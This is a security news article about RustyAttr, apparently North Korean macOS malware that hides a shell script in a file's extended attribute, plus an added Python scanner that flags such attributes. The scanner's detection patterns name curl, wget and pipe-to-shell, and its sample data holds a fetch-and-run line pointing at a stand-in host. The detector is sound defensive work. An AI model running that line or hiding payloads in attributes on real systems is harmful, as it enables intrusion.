This cunning new malware goes after macOS users with a slew of tricks
- Security researchers from Group-IB discover a unique new piece of malware
- It hides its payload in the extended attributes of macOS files
- The malware was most likely built by North Korean state-sponsored actors
Cybersecurity researchers have encountered yet another malware variant for macOS that was likely built by North Korea’s infamous Lazarus group.
Group-IB’s report concerns the discovery of RustyAttr, a brand new piece of macOS malware built using the Tauri framework.
None of the samples were flagged by the engines on VirusTotal, and at one point the malware was signed with a legitimate Apple developer certificate, which has since been revoked.
Extended attributes
Days before, Jamf researchers found something similar: a seemingly benign app on VirusTotal, built with Flutter, that served as a backdoor for macOS victims.
In both cases, the malware used new obfuscation methods but was not yet fully operational, leading researchers to believe they were just experiments while crooks looked for new ways to hide the infection.
RustyAttr abuses macOS extended attributes to hide its payload, the researchers say.
Extended attributes (xattrs) are a feature that lets files and folders carry extra metadata beyond the standard attributes such as name, size, and permissions. They are used for a variety of things, from storing security-related information (the macOS quarantine flag that triggers the “downloaded from the internet” prompt is one) to tagging files with specific metadata and keeping compatibility with other file systems. Finder does not display their contents, and ls -l only marks a file that has them with an @, which makes them a convenient hiding place. In this case, the attribute was named “test” and contained a shell script.
When the malware runs, it loads a web page that contains a piece of JavaScript, preload.js. This script reads the contents of the “test” attribute and hands them to a ‘run_command’ function, which executes the embedded shell script.
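The mechanism described above is cheap to reproduce and, more usefully, cheap to hunt for. The script below is an added example, not Group-IB’s tooling or any part of RustyAttr: it reads every extended attribute on the files under a directory (os.listxattr on Linux, the xattr command on macOS, where Python has no xattr API) and flags attribute values that look like shell scripts. The scoring patterns, the threshold of 2, and the sample attribute values embedded for a dry run are all the author’s own assumptions, not indicators from the report.

```python
"""Hunt for shell scripts hidden in extended attributes (added example,
not Group-IB's code or RustyAttr's). Patterns/threshold are assumptions."""
from __future__ import annotations

import os
import re
import subprocess
import sys
from pathlib import Path

# Heuristics for "this attribute value is a shell script". Weighted so a
# shebang alone is enough; otherwise two distinct shell-isms are needed.
SHEBANG = re.compile(rb"\A#!\s*/")
SHELL_PATTERNS = [
    re.compile(rb"/bin/(ba|z|k)?sh\b"),                                # interpreter path
    re.compile(rb"\b(curl|wget|osascript|open|chmod|nohup|base64)\b"),  # usual tooling
    re.compile(rb"\$\(|\$\{|`"),                                       # command substitution
    re.compile(rb"&&|\|\||\|\s*(ba|z)?sh\b|>\s*/dev/null"),            # chaining / piping to a shell
]


def script_score(value: bytes) -> int:
    """Return a score; a value of 2 or more means the bytes look like a shell script."""
    score = 2 if SHEBANG.match(value) else 0
    score += sum(1 for pat in SHELL_PATTERNS if pat.search(value))
    return score


def looks_like_script(value: bytes, threshold: int = 2) -> bool:
    return script_score(value) >= threshold


def list_xattrs(path: str) -> dict[str, bytes]:
    """Read every extended attribute of one file into {name: raw value}."""
    if hasattr(os, "listxattr"):  # Linux: os.listxattr / os.getxattr exist
        return {
            name: os.getxattr(path, name, follow_symlinks=False)
            for name in os.listxattr(path, follow_symlinks=False)
        }
    # macOS has no os.listxattr; use xattr(1). "xattr FILE" lists names,
    # "xattr -p NAME FILE" prints a value (non-text values come out hex-dumped).
    names = subprocess.run(["xattr", path], capture_output=True, text=True,
                           check=True).stdout.split()
    return {
        name: subprocess.run(["xattr", "-p", name, path], capture_output=True,
                             check=True).stdout
        for name in names
    }


def flag_attributes(attrs_by_path: dict[str, dict[str, bytes]],
                    threshold: int = 2) -> list[tuple[str, str, int]]:
    """Pure part of the scan: from {path: {attr: value}} return the
    (path, attribute, score) triples whose value looks like a script."""
    findings = []
    for path, attrs in attrs_by_path.items():
        for name, value in attrs.items():
            score = script_score(value)
            if score >= threshold:
                findings.append((path, name, score))
    return findings


def scan(root: str) -> list[tuple[str, str, int]]:
    """Walk root and flag every file or folder whose xattrs hide a script."""
    collected: dict[str, dict[str, bytes]] = {}
    for p in Path(root).rglob("*"):
        try:
            attrs = list_xattrs(str(p))
        except (OSError, subprocess.CalledProcessError):
            continue  # unreadable, vanished, or a filesystem without xattr support
        if attrs:
            collected[str(p)] = attrs
    return flag_attributes(collected)


# Constructed sample attributes (not real RustyAttr data) for a dry run:
# a benign quarantine flag, a Finder tag, and a script hidden in "test".
SAMPLE_ATTRS = {
    "Demo.app/Contents/MacOS/Demo": {
        "com.apple.quarantine": b"0083;66b1e2c4;Safari;4F3D5A8E-0000-0000-0000-000000000000",
        "test": b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\n",
    },
    "notes.txt": {"com.apple.metadata:_kMDItemUserTags": b"bplist00\xa1\x01SRed"},
}

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for path, name, score in (scan(target) if target else flag_attributes(SAMPLE_ATTRS)):
        print(f"{path}: attribute '{name}' looks like a shell script (score {score})")
```

Run it with no arguments to see the dry run against the embedded samples, or pass a directory (an Applications folder, a downloaded bundle) to scan real files. To confirm it fires on a planted attribute on macOS, write a script into an attribute of a scratch file with xattr -w test "$(cat payload.sh)" scratch and scan its directory; the content heuristic is deliberately name-agnostic because the attacker chooses the attribute name.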
While the script runs, the victim is shown a decoy PDF file or a fake error message in the foreground.
RustyAttr was most likely built by Lazarus, the researchers said, although since no victims have been reported, they cannot be absolutely certain. They believe the malware was built to test new delivery and obfuscation methods on macOS devices.
Via BleepingComputer